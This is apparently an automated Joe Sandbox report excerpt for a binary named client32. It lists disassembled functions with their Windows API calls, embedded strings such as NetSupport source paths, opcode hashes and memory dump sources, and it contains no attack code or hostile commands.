                                                                                                                                                    • Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                                                                                    • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                                                                                                    • Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                                                                                    • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                                                                                                    Function 110B9680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B969F
                                                                                                                                                    • MoveWindow.USER32(8D111949,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA885), ref: 110B96D8
                                                                                                                                                    • SetTimer.USER32(8D111949,0000050D,000007D0,00000000), ref: 110B9710
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoMoveParametersSystemTimerWindow
                                                                                                                                                    • String ID: Max
                                                                                                                                                    • API String ID: 1521622399-2772132969
                                                                                                                                                    • Opcode ID: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                                                                                    • Instruction ID: 87ccea237e2aa79ae125a3322bdb2c24729383307459d143463b3682e3a222a8
                                                                                                                                                    • Opcode Fuzzy Hash: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                                                                                    • Instruction Fuzzy Hash: A2213DB5A40309AFD714DFA4C885FAFF7B8EB48710F10452EE96597380CB70A941CBA0
                                                                                                                                                    Function 11153570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memmove.LIBCMT ref: 111535AC
                                                                                                                                                    • _memmove.LIBCMT ref: 111535E6
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                                                                                    • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                                                                                    • API String ID: 6605023-1396654219
                                                                                                                                                    • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                                                                                    • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                                                                                                    • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                                                                                    • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                                                                                                    Function 110395A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                    • API String ID: 1136984157-1986719024
                                                                                                                                                    • Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                                                                                    • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                                                                                                    • Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                                                                                    • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                                                                                                    Function 11015400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                    • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                                                                    • API String ID: 819365019-2727927828
                                                                                                                                                    • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                                                                    • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                                                                                    • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                                                                    • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                                                                                    Function 110ED470 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(?), ref: 110ED498
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                                    • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                                                                                    • API String ID: 2577986331-1331251348
                                                                                                                                                    • Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                                                                                    • Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
                                                                                                                                                    • Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                                                                                    • Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9
                                                                                                                                                    Function 1103F4C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
                                                                                                                                                      • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                                                                                      • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
                                                                                                                                                      • Part of subcall function 1103F450: Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                                                                                      • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                                                                                      • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 1103F4EA
                                                                                                                                                    • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD
                                                                                                                                                    Strings
                                                                                                                                                    • PCIVideoSlave32, xrefs: 1103F508
                                                                                                                                                    • DoMMData - could not find %s window, xrefs: 1103F50D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Find$MessageSendSleep
                                                                                                                                                    • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                                                                                                                    • API String ID: 1010850397-3146847729
                                                                                                                                                    • Opcode ID: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                                                                                    • Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
                                                                                                                                                    • Opcode Fuzzy Hash: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                                                                                    • Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB
                                                                                                                                                    Function 11081680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 110816D7
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                                                                                    • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                    • API String ID: 2441568934-1875806619
                                                                                                                                                    • Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                                                                                    • Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
                                                                                                                                                    • Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                                                                                    • Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2
                                                                                                                                                    Function 1103D1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,757323A0,1100BF7B), ref: 11110928
                                                                                                                                                      • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                                                                                    • _free.LIBCMT ref: 1103D221
                                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                      • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                                                                                                    • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                                                                                                    Strings
                                                                                                                                                    • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                                                                                                    • String ID: Show has overrun too much, aborting
                                                                                                                                                    • API String ID: 304545663-4092325870
                                                                                                                                                    • Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                                                                                    • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
                                                                                                                                                    • Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                                                                                    • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                                                                                                    Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                                                                                                    • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
